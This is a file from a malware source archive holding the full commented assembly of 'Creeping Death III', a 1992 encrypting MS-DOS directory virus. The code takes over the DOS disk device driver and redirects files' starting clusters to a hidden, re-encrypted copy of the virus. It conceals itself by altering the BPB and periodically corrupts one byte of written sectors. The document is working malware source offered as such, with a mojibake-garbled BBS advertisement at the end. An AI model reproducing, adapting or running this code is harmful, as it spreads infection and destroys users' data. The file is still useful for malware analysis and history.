MalwareSourceCode/MSDOS/C-Index/Virus.MSDOS.Unknown.cdeath3.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

632 lines
21 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;*****************************************************************************;
; ;
; Creeping Death III (Encrypting, try to find it) ;
; ;
; (c) Copyright 1992 by Bit Addict ;
; ;
;*****************************************************************************;
code segment public 'code'
assume cs:code, ds:code, es:code, ss:code
;*****************************************************************************;
; ;
; Data ;
; ;
;*****************************************************************************;
org 5ch ; use the space reserved for
; the fcbs and command line
; for more inportant data,
; because we won't need this
; data when the virus is
; installed
EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
BPB_Buf db 32 dup(?) ; buffer for BPB
Request equ this dword ; address of the request header
RequestOffset dw ?
RequestSegment dw ?
org 100h ; com-file starts at offset 100
; hex
;*****************************************************************************;
; ;
; Actual start of virus. In this part the virus initializes the stack and ;
; adjusts the device driver used by dos to read and write from floppy's and ;
; hard disks. Then it will start the orginal exe or com-file ;
; ;
;*****************************************************************************;
Encrypt: mov si,offset Main-1 ; this part of the program
mov cx,400h-11 ; will decode the encoded
Repeat: xor byte ptr [si],0 ; program, so it can be
inc si ; executed
loop Repeat
Main: mov sp,600h ; init stack
inc word ptr Counter
;*****************************************************************************;
; ;
; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
; si will be -1 ;
; ;
;*****************************************************************************;
DosVersion: mov ah,30h ; fn 30h = Get Dosversion
int 21h ; int 21h
cmp al,4 ; major dosversion
sbb di,di
mov byte ptr drive[2],-1 ; set 2nd operand of cmp ah,??
;*****************************************************************************;
; ;
; Adjust the size of the codesegment, with dos function 4ah ;
; ;
;*****************************************************************************;
mov bx,60h ; Adjust size of memory block
mov ah,4ah ; to 60 paragraphs = 600h bytes
int 21h ; int 21h
mov ah,52h ; get internal list of lists
int 21h ; int 21h
;*****************************************************************************;
; ;
; If the virus code segment is located behind the dos config memory block the ;
; code segment will be part of the config memory block making it 61h ;
; paragraphs larger. If the virus is not located next to the config memory ;
; block the virus will set the owner to 8h (Dos system) ;
; ;
;*****************************************************************************;
mov ax,es:[bx-2] ; segment of first MCB
mov dx,cs ; dx = MCB of the code segment
dec dx
NextMCB: mov ds,ax ; ax = segment next MCB
add ax,ds:[3]
inc ax
cmp ax,dx ; are they equal ?
jne NextMCB ; no, not 1st program executed
cmp word ptr ds:[1],8
jne NoBoot
add word ptr ds:[3],61h ; add 61h to size of block
NoBoot: mov ds,dx ; ds = segment of MCB
mov word ptr ds:[1],8 ; owner = dos system
;*****************************************************************************;
; ;
; The virus will search for the disk paramenter block for drive a: - c: in ;
; order to find the device driver for these block devices. If any of these ;
; blocks is found the virus will install its own device driver and set the ;
; access flag to -1 to tell dos this device hasn't been accesed yet. ;
; ;
;*****************************************************************************;
cld ; clear direction flag
lds bx,es:[bx] ; get pointer to first drive
; paramenter block
Search: cmp bx,-1 ; last block ?
je Last
mov ax,ds:[bx+di+15h] ; get segment of device header
cmp ax,70h ; dos device header ??
jne Next ; no, go to next device
xchg ax,cx
mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive
; has not been accessed"
mov si,offset Header-4 ; set address of new device
xchg si,ds:[bx+di+13h] ; and save old address
mov ds:[bx+di+15h],cs
Next: lds bx,ds:[bx+di+19h] ; next drive parameter block
jmp Search
;*****************************************************************************;
; ;
; If the virus has failed in starting the orginal exe-file it will jump here. ;
; ;
;*****************************************************************************;
Boot: mov ds,ds:[16h] ; es = parent PSP
mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
xor si,si
sub bx,1 ; filename+path available ?
jnb Exec ; yes, execute it
mov ax,cs ; get segment of MCB
dec ax
mov ds,ax
mov cl,8 ; count length of filename
mov si,8
mov di,0ffh
Count: lodsb
or al,al
loopne Count
not cl
and cl,7
NextByte: mov si,8 ; search for this name in the
inc di ; parent PSP to find the path
push di ; to this file
push cx
rep cmpsb
pop cx
pop di
jne NextByte
BeginName: dec di ; name found, search for start
cmp byte ptr es:[di-1],0 ; of name+path
jne BeginName
mov si,di
mov bx,es
jmp short Exec ; execute it
;*****************************************************************************;
; ;
; If none of these devices is found it means the virus is already resident ;
; and the virus wasn't able to start the orginal exe-file (the file is ;
; corrupted by copying it without the virus memory resident). If the device ;
; is found the information in the header is copied. ;
; ;
;*****************************************************************************;
Last: jcxz Exit
;*****************************************************************************;
; ;
; The information about the dos device driver is copyed to the virus code ;
; segment ;
; ;
;*****************************************************************************;
mov ds,cx ; ds = segment of Device Driver
add si,4
push cs
pop es
mov di,offset Header ; prepare header of the viral
movsw ; device driver and save the
lodsw ; address of the dos strategy
mov es:StrBlock,ax ; and interrupt procedures
mov ax,offset Strategy
stosw
lodsw
mov es:IntBlock,ax
mov ax,offset Interrupt
stosw
movsb
;*****************************************************************************;
; ;
; Deallocate the environment memory block and start the this file again, but ;
; if the virus succeeds it will start the orginal exe-file. ;
; ;
;*****************************************************************************;
push cs
pop ds
mov bx,ds:[2ch] ; environment segment
or bx,bx ; environment available ?
jz Boot ; no, computer is rebooted
mov es,bx
mov ah,49h ; deallocate memory
int 21h
xor ax,ax ; end of environment is marked
mov di,1 ; with two zero bytes
Seek: dec di ; scan for end of environment
scasw
jne Seek
lea si,ds:[di+2] ; es:si = start of filename
Exec: push bx
push cs
pop ds
mov bx,offset Param
mov ds:[bx+4],cs ; set segments in EPB
mov ds:[bx+8],cs
mov ds:[bx+12],cs
pop ds
push cs
pop es
mov di,offset Filename ; copy name of this file
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh ; open file, this file will
mov dx,offset File ; not be found but the entire
int 21h ; directory is searched and
pop dx ; infected
mov ax,4b00h ; execute file
int 21h
Exit: mov ah,4dh ; get exit-code
int 21h
mov ah,4ch ; terminate (al = exit code)
int 21h
;*****************************************************************************;
; ;
; Installation complete ;
; ;
;*****************************************************************************;
; ;
; The next part contains the device driver used by creeping death to infect ;
; directory's ;
; ;
; The device driver uses only the strategy routine to handle the requests. ;
; I don't know if this is because the virus will work better or the writer ;
; of this virus didn't know how to do it right. ;
; ;
;*****************************************************************************;
Strategy: mov cs:RequestOffset,bx ; store segment and offset of
mov cs:RequestSegment,es ; request block
retf ; return to dos (or whatever
; called this device driver)
Interrupt: push ax ; driver strategy block
push bx ; save registers
push cx
push dx
push si
push di
push ds
push es
les bx,cs:Request ; es:bx = request block
push es ; ds:bx = request block
pop ds
mov al,ds:[bx+2] ; command code
cmp al,4 ; read sector from disk
je Input
cmp al,8 ; write sector to disk
je Output
cmp al,9
je Output
call DoRequest ; let dos do handle the request
cmp al,2 ; Build BPB
jne Return
lds si,ds:[bx+12h] ; copy the BPB and change it
mov di,offset bpb_buf ; into one that hides the virus
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es ; copy
push cs
pop es
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,ds:[di+2-32] ; change
cmp al,2
adc al,0
cbw
cmp word ptr ds:[di+8-32],0 ; >32mb partition ?
je m32 ; yes, jump to m32
sub ds:[di+8-32],ax ; <32mb partition
jmp short Return
m32: sub ds:[di+15h-32],ax ; >32mb partition
sbb word ptr ds:[di+17h-32],0
Return: pop es ; return to caller
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
retf
Output: inc byte ptr cs:Random ; increase counter
jnz Skip ; zero ?
push bx ; yes, change one byte in the
push ds ; sector to write
lds bx,ds:[bx+16h]
inc bh
inc byte ptr ds:[bx] ; destroy some data
pop ds
pop bx
Skip: mov cx,0ff09h
call Check ; check if disk changed
jz Disk ; yes, write virus to disk
jmp InfectSector ; no, just infect sector
Disk: call DoRequest
jmp short InfectDisk
ReadError: add sp,16 ; error during request
jmp short Return
Input: call check ; check if disk changed
jnz InfectDisk ; no, read sector
jmp Read
InfectDisk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk
cld ; save last part of request
lea si,ds:[bx+0eh]
mov cx,8
Save: lodsw
push ax
loop Save
mov word ptr ds:[bx+14h],1 ; read 1st sector on disk
call ReadSector
jnz ReadError
mov byte ptr ds:[bx+2],2 ; build BPB
call DoRequest
lds si,ds:[bx+12h] ; ds:si = BPB
mov di,ds:[si+6] ; size of root directory
add di,15 ; in sectors
mov cl,4
shr di,cl
mov al,ds:[si+5]
cbw
mov dx,ds:[si+0bh]
mul dx ; ax=fat sectors, dx=0
add ax,ds:[si+3]
add di,ax
push di ; save it on stack
mov ax,ds:[si+8] ; total number of sectors
cmp ax,dx ; >32mb
jnz More ; no, skip next 2 instructions
mov ax,ds:[si+15h] ; get number of sectors
mov dx,ds:[si+17h]
More: xor cx,cx ; cx=0
sub ax,di ; dx:ax=number is data sectors
sbb dx,cx
mov cl,ds:[si+2] ; cx=sectors / cluster
div cx ; number of clusters on disk
cmp cl,2 ; 1 sector/cluster ?
sbb ax,-1 ; number of clusters (+1 or +2)
push ax ; save it on stack
call Convert ; get fat sector and offset in
mov byte ptr es:[bx+2],4 ; sector
mov es:[bx+14h],ax
call ReadSector ; read fat sector
lds si,es:[bx+0eh]
add si,dx
sub dh,cl ; has something to do with the
adc dx,ax ; encryption of the pointers
mov word ptr cs:[gad+1],dx
cmp cl,1 ; 1 sector / cluster
jne Ok
not di ; this is used when the
and ds:[si],di ; clusters are 1 sector long
pop ax ; allocate 1st cluster
push ax
inc ax
push ax
mov dx,0fh
test di,dx
jz Here
inc dx
mul dx
Here: or ds:[si],ax
pop ax
call Convert
mov si,es:[bx+0eh]
add si,dx
Ok: mov ax,ds:[si] ; allocate last cluster
and ax,di
mov dx,di
dec dx
and dx,di
not di
and ds:[si],di
or ds:[si],dx
cmp ax,dx ; cluster already allocated by
pop ax ; the virus ?
pop di
mov word ptr cs:[pointer+1],ax
je DiskInfected ; yes, don't write it and go on
mov dx,ds:[si]
mov byte ptr es:[bx+2],8 ; write the adjusted sector to
call DoRequest ; disk
jnz DiskInfected
mov byte ptr es:[bx+2],4 ; read it again
call ReadSector
cmp ds:[si],dx ; is it written correctly ?
jne DiskInfected ; no, can't infect disk
dec ax
dec ax ; calculate the sector number
mul cx ; to write the virus to
add ax,di
adc dx,0
push es
pop ds
mov word ptr ds:[bx+12h],2
mov ds:[bx+14h],ax ; store it in the request hdr
test dx,dx
jz Less
mov word ptr ds:[bx+14h],-1
mov ds:[bx+1ah],ax
mov ds:[bx+1ch],dx
Less: mov ds:[bx+10h],cs
mov ds:[bx+0eh],100h
mov byte ptr es:[bx+2],8 ; write it
call EncryptWrite1
DiskInfected: mov byte ptr ds:[bx+2],4 ; restore this byte
std ; restore other part of the
lea di,ds:[bx+1ch] ; request
mov cx,8
Load: pop ax
stosw
loop Load
Read: call DoRequest ; do request
mov cx,9
InfectSector: mov di,es:[bx+12h] ; get number of sectors read
lds si,es:[bx+0eh] ; get address of data
sal di,cl ; calculate end of buffer
xor cl,cl
add di,si
xor dl,dl
push ds ; infect the sector
push si
call find
jcxz no_inf ; write sector ?
mov al,8
xchg al,es:[bx+2] ; save command byte
call DoRequest ; write sector
mov es:[bx+2],al ; restore command byte
and byte ptr es:[bx+4],07fh
no_inf: pop si
pop ds
inc dx ; disinfect sector in memory
call find
jmp Return ; return to caller
;*****************************************************************************;
; ;
; Subroutines ;
; ;
;*****************************************************************************;
Find: mov ax,ds:[si+8] ; (dis)infect sector in memory
cmp ax,"XE" ; check for .exe
jne com
cmp ds:[si+10],al
je found
Com: cmp ax,"OC" ; check for .com
jne go_on
cmp byte ptr ds:[si+10],"M"
jne go_on
Found: test word ptr ds:[si+1eh],0ffc0h ; file to big
jnz go_on ; more than 4mb
test word ptr ds:[si+1dh],03ff8h ; file to small
jz go_on ; less than 2048 bytes
test byte ptr ds:[si+0bh],1ch ; directory, system or
jnz go_on ; volume label
test dl,dl ; infect or disinfect ?
jnz rest
Pointer: mov ax,1234h ; ax = viral cluster
cmp ax,ds:[si+1ah] ; file already infected ?
je go_on ; yes, go on
xchg ax,ds:[si+1ah] ; exchange pointers
Gad: xor ax,1234h ; encryption
mov ds:[si+14h],ax ; store it on another place
loop go_on ; change cx and go on
Rest: xor ax,ax ; ax = 0
xchg ax,ds:[si+14h] ; get pointer
xor ax,word ptr cs:[gad+1] ; Encrypt
mov ds:[si+1ah],ax ; store it on the right place
Go_on: rol word ptr cs:[gad+1],1 ; change encryption
add si,32 ; next directory entry
cmp di,si ; end of buffer ?
jne find ; no, do it again
ret ; return
Check: mov ah,ds:[bx+1] ; get number of unit
Drive: cmp ah,-1 ; same as last call ?
mov byte ptr cs:[drive+2],ah ; set 2nd parameter
jne Changed
push ds:[bx+0eh] ; save word
mov byte ptr ds:[bx+2],1 ; disk changed ?
call DoRequest
cmp byte ptr ds:[bx+0eh],1 ; 1=Yes
pop ds:[bx+0eh] ; restore word
mov ds:[bx+2],al ; restore command
Changed: ret ; return
ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk
DoRequest: db 09ah ; call 70:?, orginal strategy
StrBlock dw ?,70h
db 09ah ; call 70:?, orginal interrupt
IntBlock dw ?,70h
test byte ptr es:[bx+4],80h ; error ? yes, zf = 0
ret ; return
Convert: cmp ax,0ff0h ; convert cluster number into
jae Fat16 ; an sector number and offset
mov si,3 ; into this sector containing
xor word ptr cs:[si+gad-1],si ; the fat-item of this
mul si ; cluster
shr ax,1
mov di,0fffh
jnc Continue
mov di,0fff0h
jmp short Continue
Fat16: mov si,2
mul si
mov di,0ffffh
Continue: mov si,512
div si
inc ax
ret
EncryptWrite1: push ds ; write virus to disk
push cs ; (encrypted) save regs
pop ds
push es
push cs
pop es
cld ; copy forward
mov cx,12 ; length of encryptor
mov si,offset Encrypt ; start of encryptor
mov di,offset EncryptWrite2 ; destenation
inc byte ptr ds:[si+8] ; change xor value
rep movsb ; copy encryptor
mov cl,10 ; copy dorequest proc
mov si,offset DoRequest
rep movsb
mov cl,12 ; copy encryptor
mov si,offset Encrypt
rep movsb
mov ax,0c31fh ; store "pop ds","ret"
stosw ; instructions
pop es ; restore register
jmp EncryptWrite2 ; encrypt and write vir
;*****************************************************************************;
; ;
; Data ;
; ;
;*****************************************************************************;
File db "C:",255,0 ; the virus tries to open this
; file
Counter dw 0 ; this will count the number of
; systems that are infected by
; this virus
Param dw 0,80h,?,5ch,?,6ch,? ; parameters for the
; exec-function
Random db ? ; if this byte becomes zero
; the virus will change the
; sector that will be written
; to disk
Header db 7 dup(?) ; this is the header for the
; device driver
Filename db ? ; Buffer for the filename used
; by the exec-function
;*****************************************************************************;
; ;
; The End ;
; ;
;*****************************************************************************;
code ends ; end of the viral code
end Encrypt ; start at offset 100h for
; com-file

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>